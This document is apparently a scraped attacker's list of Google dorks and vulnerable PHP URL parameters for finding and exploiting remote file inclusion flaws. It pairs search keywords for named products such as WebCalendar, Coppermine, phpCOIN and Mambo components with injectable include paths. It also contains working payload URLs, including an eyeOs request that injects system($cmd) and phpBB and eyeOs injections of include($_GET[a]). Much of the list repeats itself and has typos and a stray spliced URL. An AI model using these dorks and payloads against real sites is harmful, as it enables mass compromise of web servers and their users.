/index.php?cms= /index.php?cms=&#13;
/index.php?cms= /index.php?cms="&#13;
index.php?command= index.php?command="&#13;
index.php?command= .php?command="&#13;
index.php?content= index.php?content=&#13;
index.php?content= .php?content=&#13;
index.php?c= .php?c=&#13;
index.php?d1= .php?d1="&#13;
index.php?def= index.php?def="&#13;
index.php?def= .php?def="&#13;
index.php?def= index.php?def=&#13;
/index.php?dn= /index.php?dn=&#13;
/index.php?dn= index.php?dn="&#13;
/index.php?dn= .php?dn=&#13;
/index.php?dn= .php?dn="&#13;
index.php?dok= index.php?dok="&#13;
index.php?dok= .php?dok="&#13;
index.php?e= index.php?e="&#13;
index.php?exec= index.php?exec=&#13;
index.php?exec= .php?exec=&#13;
index.php?f1= .php?f1="&#13;
index.php?f= index.php?f="&#13;
index.php?fase= index.php?fase="&#13;
index.php?fase= .php?fase="&#13;
index.php?file= index.php?file="&#13;
index.php?fn= index.php?fn="&#13;
index.php?fn= .php?fn="&#13;
index.php?fPage= index.php?fPage="&#13;
index.php?fPage= index.php?fPage=&#13;
index.php?fPage= .php?fPage=&#13;
index.php?fPage= .php?fPage="&#13;
index.php?fPage= index.php?fPage=&#13;
index.php?fset= .php?fset="&#13;
index.php?func= .php?func="&#13;
index.php?goto= index.php?goto="&#13;
index.php?goto= .php?goto="&#13;
index.php?id=1&amp;lang= index.php?i=&#13;
index.php?id=1&amp;lang= "index.php?id="&#13;
index.php?id=1&amp;lang= index.php?id=&#13;
index.php?id=1&amp;lang= ".php?id="&#13;
index.php?id= index.php?id="&#13;
/index.php?id=&amp;lang= index.php?id="&#13;
/index.php?id=&amp;lang= .php?id="&#13;
index.php?id=&amp;lang= "index.php?id="&#13;
index.php?id=&amp;lang= ".php?id="&#13;
/index.php?id=&amp;page= index.php?id="&#13;
/index.php?id=&amp;page= .php?id="&#13;
index.php?inc= .php?inc="&#13;
index.php?ir= ".php?ir="&#13;
/index.php?lang=en&amp;cat= index.php?lang="&#13;
/index.php?lang=en&amp;cat= .php?lang="&#13;
/index.php?lang=en&amp;page= index.php?lang="&#13;
/index.php?lang=en&amp;page= .php?lang="&#13;
/index.php?lang=en&amp;page= index.php?lang=&#13;
index.php?lang=en&amp;page= index.php?lang=&#13;
/index.php?lang=en&amp;page= .php?lang=&#13;
index.php?lang=en&amp;page= .php?lang=&#13;
index.php?lang= "index.php?lang="&#13;
index.php?lang= index.php?lang=&#13;
index.php?lang=&amp;page= index.php?lang=&#13;
index.php?lang=&amp;page= .php?lang=&#13;
index.php?lg= "index.php?lg="&#13;
index.php?lg= index.php?lg=&#13;
index.php?lk= .php?lk="&#13;
/index.php?ln= .php?ln=&#13;
index.php?lng= "index.php?lng="&#13;
index.php?lng= index.php?lng=&#13;
index.php?ln= "index.php?ln="&#13;
index.php?ln= index.php?ln=&#13;
index.php?ln= ".php?ln="&#13;
index.php?lnk= index.php?lnk=&#13;
index.php?lnk= .php?lnk=&#13;
index.php?lnk= "index.php?lnk="&#13;
index.php?lnk= ".php?lnk="&#13;
index.php?ln= .php?ln=&#13;
index.php?loca= index.php?loca=&#13;
/index.php?loc= .php?loc="&#13;
index.php?loca= .php?loca=&#13;
/index.php?loc=&amp;cat= index.php?loc="&#13;
/index.php?loc=&amp;cat= .php?loc="&#13;
/index.php?loc=&amp;lang= index.php?loc="&#13;
/index.php?loc=&amp;lang= .php?loc="&#13;
/index.php?loc=&amp;page= index.php?loc="&#13;
/index.php?loc= .php?loc=&#13;
/index.php?loc=start&amp;page= index.php?loc="&#13;
index.php?ltr= index.php?ltr="&#13;
index.php?ltr= .php?ltr="&#13;
index.php?main= .php?main="&#13;
index.php?m= index.php?m="&#13;
index.php?meio= index.php?meio="&#13;
index.php?meio= index.php?meio=&#13;
index.php?meio= .php?meio=&#13;
index.php?meio= .php?meio="&#13;
index.php?mf= index.php?mf=&#13;
index.php?mf= .php?mf=&#13;
index.php?mf= .php?mf="&#13;
index.php?mid= index.php?mid="&#13;
index.php?mid= index.php?mid=&#13;
index.php?mid= .php?mid=&#13;
index.php?mid= .php?mid="&#13;
index.php?middle= index.php?middle="&#13;
index.php?middle= index.php?middle=&#13;
index.php?middle= .php?middle="&#13;
index.php?mn= index.php?mn="&#13;
index.php?mn= .php?mn="&#13;
index.php?mod= index.php?mod="&#13;
index.php?mod= .php?mod="&#13;
index.php?new= index.php?new="&#13;
index.php?news= index.php?news="&#13;
index.php?page1= index.php?page1="&#13;
index.php?page1= .php?page1="&#13;
index.php?page= php5?page=&#13;
index.php?page= index.php?page=&#13;
index.php?page=&amp;lang= index.php?p=&#13;
index.php?page=&amp;lang= index.php?pag=&#13;
index.php?page=&amp;lang= index.php?page=&#13;
index.php?page=&amp;lang= index.php?pg=&#13;
index.php?page=&amp;lang= .php?p=&#13;
index.php?page=&amp;lang= .php?pag=&#13;
index.php?page=&amp;lang= .php?page=&#13;
index.php?page=&amp;lang= .php?pg=&#13;
index.php?pageN= .php?pageN="&#13;
index.php?pager= index.php?pager=&#13;
index.php?pager= .php?pager=&#13;
index.php?pagina= index.php?pagina=&#13;
index.php?pag= "index.php?pag="&#13;
index.php?pag= index.php?pag=&#13;
index.php?p= index.php?p="&#13;
index.php?pg= "index.php?pg="&#13;
index.php?pg= index.php?pg=&#13;
index.php?prod= .php?prod="&#13;
index.php?prod= .php?product="&#13;
index.php?product= .php?prod="&#13;
index.php?product= .php?product="&#13;
index.php?r= index.php?r="&#13;
index.php?s= index.php?s="&#13;
index.php?s= index.php?s=&#13;
index.php?s= .php?s=&#13;
index.php?s= .php?s="&#13;
index.php?secao= index.php?secao=&#13;
index.php?secao= .php?secao=&#13;
index.php?secao= "index.php?secao="&#13;
index.php?secao= ".php?secao="&#13;
/index.php?seccion= /index.php?seccion=&#13;
/index.php?seccion= .php?seccion=&#13;
index.php?sec= "index.php?sec="&#13;
index.php?sec= index.php?sec=&#13;
/index.php?seite= /index.php?seite=&#13;
/index.php?seite= .php?seite=&#13;
index.php?select= .php?select="&#13;
index.php?select= index.php?select=&#13;
index.php?select= .php?select=&#13;
index.php?set= index.php?set="&#13;
index.php?set= index.php?set=&#13;
index.php?set= .php?set=&#13;
index.php?set= .php?set="&#13;
index.php?sf= index.php?sf="&#13;
index.php?show= .php?show="&#13;
index.php?s= "index.php?s="&#13;
index.php?s= index.php?s=&#13;
index.php?sit= index.php?sit="&#13;
index.php?sit= .php?sit="&#13;
/index.php?slang= /index.php?slang=&#13;
/index.php?slang= "index.php?slang="&#13;
/index.php?slang= .php?slang=&#13;
/index.php?slang= ".php?slang="&#13;
index.php?sort= .php?sort="&#13;
index.php?spage= index.php?spage="&#13;
index.php?spage= index.php?spage=&#13;
index.php?spage= .php?spage=&#13;
index.php?spage= .php?spage="&#13;
index.php?ss= index.php?ss="&#13;
index.php?ss= .php?ss="&#13;
index.php?st= index.php?st="&#13;
index.php?sub= index.php?sub="&#13;
index.php?sub= index.php?sub=&#13;
index.php?sub= .php?sub=&#13;
index.php?sub= "index.php?sub="&#13;
index.php?sub= index.php?sub=&#13;
index.php?sub= "index.php?sub=""&#13;
index.php?sub= "index.php?sub="&#13;
index.php?sub= ".php?sub="&#13;
index.php?subpage= index.php?subpage="&#13;
index.php?subpage= .php?subpage="&#13;
index.php?subp= index.php?subp="&#13;
index.php?subp= .php?subp="&#13;
index.php?table= index.php?table=&#13;
index.php?table= .php?table=&#13;
index.php?t= index.php?t="&#13;
index.php?task= index.php?task=&#13;
index.php?task= .php?task=&#13;
index.php?term= .php?term="&#13;
index.php?textfield= .php?textfield="&#13;
index.php?theme= index.php?theme=&#13;
index.php?theme= .php?theme=&#13;
index.php?theme= .php?theme=&#13;
index.php?trans= index.php?trans="&#13;
index.php?trans= .php?trans="&#13;
index.php?v= index.php?v="&#13;
index.php?ver= index.php?ver="&#13;
index.php?ver= index.php?ver=&#13;
index.php?ver= .php?ver=&#13;
index.php?ver= .php?ver="&#13;
index.php?ver= .php?ver=&#13;
/index.php?vis= /index.php?vis=&#13;
/index.php?vis= .php?vis=&#13;
index.php?way= index.php?way=&#13;
index.php?way= .php?way=&#13;
index.php?wpage= index.php?wpage="&#13;
index.php?wpage= .php?wpage="&#13;
info.php?ln= info.php?ln="&#13;
info.php?ln= info.php?ln=&#13;
info.php?ln= .php?ln="&#13;
/interna.php?meio= .php?meio="&#13;
kalender.php?vis= kalender.php"&#13;
kalender.php?vis= kalender.php?vis="&#13;
kalender.php?vis= .php?vis="&#13;
lang.php?arg= .php?arg=&#13;
lang.php?arq= .php?arq=&#13;
lang.php?lk= .php?lk="&#13;
lang.php?ln= .php?ln=&#13;
lang.php?subpage= .php?subpage="&#13;
lang.php?subp= .php?sub="&#13;
lang.php?subp= .php?subp="&#13;
/lib/db/ez_sql.php?lib_path= ttCMS&#13;
/lib/db/ez_sql.php?lib_path= ttCMS &lt;= v4&#13;
/lib/static/header.php?set_menu= iPhoto Album&#13;
/lib/static/header.php?set_menu= iPhotoAlbum&#13;
/lib/static/header.php?set_menu= iPhotoAlbum v1.1&#13;
link.php?do= .php?do="&#13;
list.php?product= .php?product=&#13;
list.php?table= .php?table=&#13;
ln.php?ln= .php?ln=&#13;
loc.php?l= .php?l="&#13;
loc.php?l= .php?loc="&#13;
loc.php?lang= .php?lang="&#13;
loc.php?lang= .php?loc="&#13;
loc.php?loc= loc.php?loc="&#13;
loc.php?loc= .php?loc="&#13;
login.php?loca= .php?loca=&#13;
magazine.php?inc= .php?inc="&#13;
main1.php?arg= .php?arg=&#13;
main1.php?ln= .php?ln=&#13;
main2.php?ln= .php?ln=&#13;
main.html.php?seite= .php?seite=&#13;
main.php3?act= main.php3?act="&#13;
main.php3?act= .php3?act="&#13;
main.php5?page= .php5?id=&#13;
main.php?a= .php?a="&#13;
main.php?arg= .php?arg=&#13;
main.php?ba= main.php?ba="&#13;
main.php?ba= .php?ba="&#13;
main.php?command= main.php?command="&#13;
main.php?command= .php?command="&#13;
main.php?d1= main.php?d1="&#13;
main.php?d1= .php?d1="&#13;
main.php?f1= .php?f1="&#13;
main.php?fset= .php?fset="&#13;
main.php?inc= .php?inc="&#13;
main.php?ln= .php?ln=&#13;
main.php?ltr= .php?ltr="&#13;
main.php?s= main.php?s="&#13;
main.php?s= main.php?s=&#13;
main.php?s= .php?s=&#13;
main.php?s= .php?s="&#13;
main.php?sit= .php?sit="&#13;
main.php?table= .php?table=&#13;
main.php?vis= main.php?vis="&#13;
main.php?vis= main.php?vis=&#13;
main.php?vis= .php?vis="&#13;
mai.php?act= mai.php?act="&#13;
mai.php?act= mai.php?act=&#13;
mai.php?loc= mai.php?loc="&#13;
mai.php?loc= mai.php?loc=&#13;
mai.php?src= mai.php?src="https://anonyviet.com/dork-sql-2015/mai.php?src= mai.php?src=&#13;
map.php?loc= map.php?loc=&#13;
middle.php?file="middle.php?file="&#13;
middle.php?file= "middle.php?page="&#13;
middle.php?file= ".php?file="&#13;
middle.php?file= ".php?page="&#13;
middle.php?file= middle.php?file=&#13;
middle.php?file= middle.php?page=&#13;
middle.php?file= .php?file=&#13;
middle.php?file= .php?page=&#13;
middle.php?page= "middle.php?page="&#13;
middle.php?page= ".php?page="&#13;
middle.php?page= middle.php?page=&#13;
middle.php?page= .php?page=&#13;
misc.php?do= .php?do="&#13;
mod.php?mod= mod.php?mod="&#13;
mod.php?mod= .php?mod="&#13;
module.php?mod= module.php?mod="&#13;
module.php?mod= .php?mod="&#13;
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook"&#13;
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= "PostGuestbook"&#13;
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= "PostGuestbook 0.6.1?&#13;
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook&#13;
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook 0.6.1&#13;
modul.php?mod= modul.php?mod="&#13;
modul.php?mod= .php?mod="&#13;
more.php?sub= "more.php?sub="&#13;
more.php?sub= more.php?sub=&#13;
nav.php?g= "nav.php?g="&#13;
nav.php?g= nav.php?g=&#13;
nav.php?go= "nav.php?go="&#13;
nav.php?go= nav.php?go=&#13;
nav.php?lk= .php?lk="&#13;
nav.php?ln= .php?ln=&#13;
nav.php?loc= nav.php&#13;
nav.php?loc= nav.php?loc=&#13;
nav.php?loc= .php?loc=&#13;
nav.php?nav= "nav.php?nav="&#13;
nav.php?nav= nav.php?nav=&#13;
nav.php?page= "nav.php?page="&#13;
nav.php?page= nav.php?page=&#13;
nav.php?pagina= "nav.php?pagina="&#13;
nav.php?pagina= nav.php?pagina=&#13;
nav.php?pag= "nav.php?pag="&#13;
nav.php?pag= nav.php?pag=&#13;
nav.php?pg= "nav.php?pg="&#13;
nav.php?pg= nav.php?pg=&#13;
nav.php?p= "nav.php?p="&#13;
nav.php?p= nav.php?p=&#13;
order.php?lang= order.php?lang=&#13;
order.php?list= order.php?list=&#13;
order.php?ln= order.php?ln=&#13;
order.php?l= order.php?l=&#13;
order.php?page= order.php?page=&#13;
order.php?pag= order.php?pag=&#13;
order.php?pg= order.php?pg=&#13;
order.php?p= order.php?p=&#13;
order.php?wp= order.php?wp=&#13;
order.php?wp= .php?wp=&#13;
/?page= .php5?id=&#13;
page.php5?id= page.php5?id=&#13;
page.php5?id= .php5?id=&#13;
page.php?arq= .php?arq=&#13;
page.php?ln= .php?ln=&#13;
page.php?p= page.php?p="&#13;
page.php?p= page.php?p=&#13;
page.php?p= .php?p=&#13;
page.php?p= .php?p="&#13;
page.php?s= page.php?s="&#13;
page.php?s= page.php?s=&#13;
page.php?s= .php?s=&#13;
page.php?s= .php?s="&#13;
/?pag= .php5?id=&#13;
/palportal/index.php?page= /palportal/&#13;
/palportal/index.php?page= pal portal&#13;
/?pg= .php5?id=&#13;
/?p= .php5?id=&#13;
p.php?p= .php?p=&#13;
p.php?p= .php?p="&#13;
p.php?p= p.php?p="&#13;
p.php?p= "p.php?p="&#13;
p.php?p= p.php?p=&#13;
presse.php?do= .php?do="&#13;
presse.php?do= presse.php?do="&#13;
print.php?pager= .php?pager=&#13;
print.php?pager= .php?pager=&#13;
print.php?pager= print.php?pager=&#13;
print.php?table= .php?table=&#13;
proddetail.php?prod= .php?prod="&#13;
prod.php?prod= .php?prod="&#13;
products.php?prod= .php?prod="&#13;
produit.php?prod= .php?prod="&#13;
produkt.php?prod= .php?prod="&#13;
/read.php?fpage= /read.php?fpage=&#13;
reports.php?sub= "reports.php?sub="&#13;
reports.php?sub= reports.php?sub=&#13;
rss.php?phpraid_dir= phpraid"&#13;
rss.php?phpraid_dir= phpraid&#13;
rss.php?phpraid_dir= ""$2-"&#13;
rss.php?phpraid_dir= "php raid"&#13;
rss.php?phpraid_dir= php raid&#13;
rss.php?phpraid_dir= phpraid&#13;
s1.php?ln= .php?ln=&#13;
search.php?exec= search.php?exec=&#13;
shop.php?prod= .php?prod="&#13;
shop.pl/page= shop.pl/page=&#13;
show.php?page1= .php?page1="&#13;
show.php?product= .php?product=&#13;
show.php?product= show.php?product=&#13;
side.php?arq= .php?arq=&#13;
side.php?table= .php?table=&#13;
side.php?vis= .php?vis=&#13;
side.php?vis= side.php?vis=&#13;
site.php?arq= .php?arq=&#13;
site.php?meio= .php?meio=&#13;
site.php?table= .php?table=&#13;
s.php?table= .php?table=&#13;
start.php?id= .php?id="&#13;
start.php?id= start.php?id="&#13;
start.php?id= start.php?id=&#13;
start.php?lang= .php?lang="&#13;
start.php?lang= start.php?lang="&#13;
start.php?lang= start.php?lang=&#13;
start.php?lang= .php?lang=&#13;
start.php?lang= start.php?lang=&#13;
start.php?mod= .php?mod="&#13;
start.php?mod= start.php?mod="&#13;
start.php?page= .php?page="&#13;
start.php?page= start.php?page="&#13;
start.php?page= start.php?page=&#13;
start.php?pag= start.php?pag=&#13;
start.php?pg= start.php?pg=&#13;
start.php?p= start.php?p=&#13;
start.php?s= .php?s="&#13;
start.php?s= start.php?s="&#13;
start.php?s= start.php?s=&#13;
start.php?s= start.php?s=&#13;
str.php?lang= str.php?lang=&#13;
str.php?ln= str.php?ln=&#13;
str.php?l= str.php?l=&#13;
str.php?page= str.php?page=&#13;
str.php?p= str.php?p=&#13;
sub.php?menu= "sub.php?menu="&#13;
sub.php?menu= sub.php?menu=&#13;
sub.php?s= "sub.php?s="&#13;
sub.php?s= sub.php?s=&#13;
sub.php?sub= "sub.php?sub="&#13;
sub.php?sub= sub.php?sub=&#13;
task.php?task= .php?task=&#13;
task.php?task= task.php?task=&#13;
/templates/mangobery/footer.sample.php?Site_Path= Mangobery&#13;
/templates/mangobery/footer.sample.php?Site_Path= Mangobery 0.5.5&#13;
/templates/mangobery/footer.sample.php?Site_Path= Mangobery-0.5.5&#13;
trans.php?trans= .php?trans="&#13;
trans.php?trans= trans.php?trans="&#13;
/trans/trans.php?trans=eng&amp;page= .php?trans="&#13;
/trans/trans.php?trans=en&amp;page= .php?trans="&#13;
/trans/trans.php?trans=fr&amp;page= .php?trans="&#13;
/trans/trans.php?trans=ko&amp;page= .php?trans="&#13;
/trans/trans.php?trans=&amp;page= .php?trans="&#13;
/trans/trans.php?trans=&amp;p= .php?trans="&#13;
view.php?sub= "view.php?sub="&#13;
view.php?sub= view.php?sub=&#13;
view.php?table= .php?table=&#13;
voir.php?inc= .php?inc="&#13;
werbungFrame.php?do= .php?do="&#13;
/ws/get_events.php?includedir= Web Calendar&#13;
/ws/get_events.php?includedir= WebCalendar&#13;
/ws/get_events.php?includedir= WebCalendar v0.9.45&#13;
/ws/get_reminders.php?includedir= WebCalendar&#13;
/ws/get_reminders.php?includedir= WebCalendar v0.9.45&#13;
/ws/login.php?includedir= WebCalendar&#13;
/ws/login.php?includedir= WebCalendar v0.9.45&#13;
ocp-103/index.php?req_path= ocPortal&#13;
images/evil.php?owned= e107&#13;
/modules/My_eGery/public/displayCategory.php?basepath=&#13;
/include/new-visitor.inc.php?lvc_include_dir=&#13;
/_functions.php?prefix=&#13;
/cpcommerce/_functions.php?prefix=&#13;
/modules/coppermine/themes/default/theme.php?THEME_DIR=&#13;
/eblog/blog.inc.php?xoopsConfig[xoops_url]=&#13;
/pm/lib.inc.php?pm_path=&#13;
/b2-tools/gm-2-b2.php?b2inc=&#13;
/modules/mod_mainmenu.php?mosConfig_absolute_path=&#13;
/modules/agendax/addevent.inc.php?agendax_path=&#13;
/includes/include_once.php?include_file=&#13;
/e107/e107_handlers/secure_img_render.php?p=&#13;
/shoutbox/expanded.php?conf=&#13;
/main.php?x=&#13;
/myPHPCalendar/admin.php?cal_dir=&#13;
/index.php/main.php?x=&#13;
/index.php?include=&#13;
/index.php?x=&#13;
/index.php?open=&#13;
/index.php?visualizar=&#13;
/template.php?pagina=&#13;
/index.php?pagina=&#13;
/index.php?inc=&#13;
/includes/include_onde.php?include_file=&#13;
/index.php?page=&#13;
/index.php?pg=&#13;
/index.php?show=&#13;
/db.php?path_local=&#13;
/index.php?site=&#13;
/htmltonuke.php?filnavn=&#13;
/livehelp/inc/pipe.php?HCL_path=&#13;
/hcl/inc/pipe.php?HCL_path=&#13;
/inc/pipe.php?HCL_path=&#13;
/support/faq/inc/pipe.php?HCL_path=&#13;
/help/faq/inc/pipe.php?HCL_path=&#13;
/helpcenter/inc/pipe.php?HCL_path=&#13;
/live-support/inc/pipe.php?HCL_path=&#13;
/gnu3/index.php?doc=&#13;
/gnu/index.php?doc=&#13;
/phpgwapi/setup/tables_update.inc.php?appdir=&#13;
/forum/inst.php?phpbb_root_dir=&#13;
/includes/calendar.php?phpc_root_path=&#13;
/includes/setup.php?phpc_root_path=&#13;
/inc/authform.inc.php?path_pre=&#13;
/include/authform.inc.php?path_pre=&#13;
index.php?sec=&#13;
index.php?filename=&#13;
index.php?dir=&#13;
index.php?document=&#13;
index.php?view=&#13;
*.php?sel=&#13;
*.php?session=&amp;content=&#13;
*.php?locate=&#13;
*.php?place=&#13;
*.php?layout=&#13;
*.php?go=&#13;
*.php?catch=&#13;
*.php?mode=&#13;
*.php?name=&#13;
*.php?loc=&#13;
*.php?f=&#13;
*.php?inf=&#13;
*.php?pg=&#13;
*.php?load=&#13;
*.php?naam=&#13;
/index.php?page= site:*.dk&#13;
/index.php?file= site:*.dk&#13;
INURL OR INURL WITH:&#13;
/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=&#13;
/includes/header.php?systempath=&#13;
/Gery/displayCategory.php?basepath=&#13;
/index.inc.php?PATH_Includes=&#13;
/ashnews.php?pathtoashnews=&#13;
/ashheadlines.php?pathtoashnews=&#13;
/demo/includes/init.php?user_inc=&#13;
/jaf/index.php?show=&#13;
/inc/shows.inc.php?cutepath=&#13;
/poll/admin/common.inc.php?base_path=&#13;
/pollvote/pollvote.php?pollname=&#13;
/sources/post.php?fil_config=&#13;
/bb_lib/checkdb.inc.php?libpach=&#13;
/include/livre_include.php?no_connect=lol&amp;chem_absolu=&#13;
/index.php?from_market=Y&amp;pageurl=&#13;
/pivot/modules/module_db.php?pivot_path=&#13;
/derniers_commentaires.php?rep=&#13;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=&#13;
/coppermine/themes/maze/theme.php?THEME_DIR=&#13;
/mylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=&#13;
/mylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=&#13;
/agendax/addevent.inc.php?agendax_path=&#13;
/modules/xoopsgery/upgrade_album.php?GERY_BASEDIR=&#13;
/default.php?page=&#13;
/index.php?action=&#13;
/index1.php?p=&#13;
/index2.php?x=&#13;
/index2.php?content=&#13;
/index.php?conteudo=&#13;
/index.php?cat=&#13;
/modules/xgery/upgrade_album.php?GERY_BASEDIR=&#13;
/library/editor/editor.php?root=&#13;
/library/lib.php?root=&#13;
/zentrack/index.php?configFile=&#13;
/becommunity/community/index.php?pageurl=&#13;
/GradeMap/index.php?page=&#13;
/index4.php?body=&#13;
/side/index.php?side=&#13;
/es/index.php?action=&#13;
/index.php?main=&#13;
/html/page.php?page=&#13;
/page.php?view=&#13;
/index.php?menu=&#13;
/content.php?page=&#13;
/main_site.php?page=&#13;
/index.php?L2=&#13;
/main.php?page=&#13;
/tutorials/print.php?page=&#13;
/index.php?inter_url=&#13;
/index2.php?menu=&#13;
/index.php?level=&#13;
/index1.php?main=&#13;
/index1.php?nav=&#13;
/index1.php?link=&#13;
/index2.php?page=&#13;
/index.php?myContent=&#13;
/index.php?TWC=&#13;
/index.php?sec=&#13;
/index.php?babInstPath=&#13;
/main.php?body=&#13;
/index.php?z=&#13;
/main.php?view=&#13;
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=&#13;
/index.php?file=&#13;
1. my_egery site:.org&#13;
2. xgery site:.org&#13;
3. coppermine site:.org&#13;
4. 4nAlbum site:.org&#13;
/modules/4nAlbum/public/displayCategory.php?basepath=&#13;
5. inurlP:NphpBB2 site:.org&#13;
6. ihm.php?p=&#13;
7. Keyword : "powered by MyLinks"&#13;
8. /modules.php?name=myguests&#13;
/modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]=&#13;
9. /Popper/index.php?&#13;
/Popper/index.php?childwindow.inc.php?form=&#13;
10. google = kietu/hit_js.php, kietu/hit_js.php&#13;
yahoo = by Kietu? v 3.2&#13;
/kietu/index.php?kietu[url_hit]=&#13;
11. keyword : "Powered by phpBB 2.0.6"&#13;
/html&amp;highlight=%2527.include($_GET[a]),exit.%2527&amp;a=&#13;
12. keyword : "powered by CubeCart 3.0.6"&#13;
13. keyword : "powered by paBugs 2.0 Beta 3?&#13;
14. powered by AshNews", AshNews atau /ashnews.php&#13;
15. keyword : /phorum/login.php&#13;
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=&#13;
16. ihm.php?p=*&#13;
14. keyword : "powered eyeOs"&#13;
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&amp;a=eyeOptions.eyeapp&amp;_SESSION%5busr%5d=root&amp;_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&amp;cmd=id&#13;
diganti dengan :&#13;
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&amp;a=eyeOptions.eyeapp&amp;_SESSION%5busr%5d=root&amp;_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&amp;a=&#13;
15. .php?bodyfile=&#13;
16. /includes/orderSuccess.inc.php?glob=&#13;
17. forums.html&#13;
/modules.php?name=&#13;
18. /default.php?page=home&#13;
19. /folder.php?id=&#13;
20. main.php?pagina=&#13;
/paginedinamiche/main.php?pagina=&#13;
21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( *.edu.*/modules.php?name=myguests ) or ( "powered by MyGuests")&#13;
22. application.php?base_path=&#13;
/application.php?base_path=&#13;
23. inurlp:hplivehelper&#13;
/phplivehelper/initiate.php?abs_path=&#13;
24. inurlp:hpnuke&#13;
25. key word : "powered by Fantastic News v2.1.2"&#13;
/archive.php?CONFIG[script_path]=&#13;
26. keyword: "powered by smartblog" AND ?page=login&#13;
27. /forum/&#13;
/forum/admin/index.php?inc_conf=&#13;
28. keyword:"Powered By FusionPHP"&#13;
/templates/headline_temp.php?nst_inc=&#13;
29. shoutbox/expanded.php filetypep:hp&#13;
30. /osticket/&#13;
/osticket/include/main.php?config[search_disp]=true&amp;include_dir=&#13;
31. keyword : "Powered by iUser"&#13;
/common.php?include_path=&#13;
32. "static.php?load="&#13;
/static.php?load=&#13;
33. keyworld : /phpcoin/login.php&#13;
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=&#13;
34. keyworld: /phpGedview/login.php site:&#13;
/help_text_vars.php?dir&amp;PGV_BASE_DIRECTORY=&#13;
35. /folder.php?id=&#13;
/classes.php?LOCAL_PATH=&#13;
"/lire.php?rub="&#13;
"/os/pointer.php?url="&#13;
"folder.php?id="&#13;
"show.php?page="&#13;
"index2.php?DoAction="&#13;
"index.php?canal="&#13;
"index.php?screen="&#13;
"index.php?langc="&#13;
"index.php?Language="&#13;
"view.php?page="&#13;
dork: "powered by doodle cart"&#13;
rfi of this dork: enc/content.php?Home_Path=&#13;
dork: "Login to Calendar"&#13;
rfi of this dork: /embed/day.php?path=&#13;
dork: "powered by EQdkp"&#13;
rfi of this dork: /includes/dbal.php?eqdkp_root_path=&#13;
"template.php?goto="&#13;
"video.php?content="&#13;
"pages.php?page="&#13;
"index1.php?choix="&#13;
"index1.php?menu="&#13;
"index2.php?ascii_seite="&#13;
dork: surveys&#13;
rfi to this dork: /surveys/survey.inc.php?path=&#13;
"index.php?body="&#13;
dork: adobt sitel&#13;
rfi to this dork: /classes/adodbt/sql.php?classes_dir=&#13;
dork: "Powered By ScozNews"&#13;
rfi to this dork: /sources/functions.php?CONFIG[main_path]=&#13;
rfi to this dork: /sources/template.php?CONFIG[main_path]=&#13;
"kb_constants.php?module_root_path="&#13;
dork: mcf.php"&#13;
rfi to this dork: /mcf.php?content=&#13;
dork: "main.php?sayfa="&#13;
rfi to this dork: /main.php?sayfa=&#13;
dork: "MobilePublisherPHP"&#13;
rfi to this dork: /header.php?abspath=&#13;
dork: "powered by phpCOIN 1.2.3"&#13;
rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=&#13;
login.php?dir=&#13;
"index.php?go="&#13;
"index1.php?="&#13;
"lib/gore.php?libpath="&#13;
"index2.php?p="&#13;
/classes/adodbt/sql.php?classes_dir=&#13;
/classified_right.php?language_dir=&#13;
/sources/template.php?CONFIG[main_path]=&#13;
/sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]=&#13;
/mcf.php?content=&#13;
/zipndownload.php?PP_PATH=&#13;
/administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=&#13;
impex/ImpExData.php?systempath=&#13;
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=&#13;
/login.php?dir=&#13;
/tags.php?BBCodeFile=&#13;
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=&#13;
index1.php?=&#13;
main.php?id=&#13;
lib/gore.php?libpath=&#13;
news_detail.php?file=&#13;
old_reports.php?file=&#13;
index.php?nic=&#13;
homepage.php?sel=&#13;
index.php?sel=&#13;
components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=&#13;
main.php?pagina=&#13;
test.php?page=&#13;
index.php?lang=&#13;
index.php?_REQUEST=&amp;_REQUEST%5boption%5d=com_content&amp;_REQUEST%5bItemid%5d=1&amp;GLOBALS=&amp;mosConfig_absolute_path=&#13;
index.php?mode=&#13;
index.php?stranica=&#13;
index.php?sub=&#13;
index.php?t=&#13;
solpot.html?body=&#13;
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=&#13;
/tools/send_reminders.php?includedir=&#13;
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=&#13;
index.php?u=&#13;
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=&#13;
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=&#13;
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=&#13;
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=&#13;
show_news.php?cutepath=&#13;
page.php?doc=&#13;
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=&#13;
components/com_geria/geria.html.php?mosConfig_absolute_path=&#13;
/functions.php?include_path=&#13;
/modules/coppermine/include/init.inc.php?CPG_M_DIR=&#13;
/include/write.php?dir=&#13;
db.php?path_local=&#13;
index.php?file=&#13;
index.php?content=&#13;
index.php?kobr=&#13;
index.php?l=&#13;
index.php?a=&#13;
index.php?opcao=&#13;
index.php?conteudo=&#13;
